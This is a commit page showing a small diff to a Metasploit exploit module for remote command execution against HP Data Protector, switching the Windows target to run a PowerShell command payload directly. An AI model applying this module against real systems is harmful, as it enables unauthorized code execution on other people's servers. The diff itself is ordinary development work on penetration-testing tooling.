Skip to content

Commit 39a09ad

Browse files
jvazquez-r7jvazquez-r7
committed
Use ARCH_CMD on Windows target
1 parent a0fc0cf commit 39a09ad

File tree

1 file changed

+11
-5
lines changed

1 file changed

+11
-5
lines changed

modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb

Lines changed: 11 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -59,7 +59,13 @@ def initialize(info = {})
5959
[ 'Windows 64 bits / HP Data Protector 9',
6060
{
6161
'Platform' => 'win',
62-
'Arch' => ARCH_X86_64,
62+
'Arch' => ARCH_CMD,
63+
'Payload' => {
64+
'Compat' => {
65+
'PayloadType' => 'cmd',
66+
'RequiredCmd' => 'powershell'
67+
}
68+
}
6369
}
6470
]
6571
],
@@ -114,11 +120,11 @@ def exploit
114120
end
115121

116122
if target.name =~ /Windows/
117-
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true})
118-
print_status("#{peer} - Exploiting through Powershell...")
119-
execute_windows(command, dir)
123+
#command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true})
124+
print_status("#{peer} - Executing payload...")
125+
execute_windows(payload.encoded, dir)
120126
else
121-
print_status("#{peer} - Exploiting payload...")
127+
print_status("#{peer} - Executing payload...")
122128
execute_linux(payload.encoded, dir)
123129
end
124130
end

0 commit comments

Comments
 (0)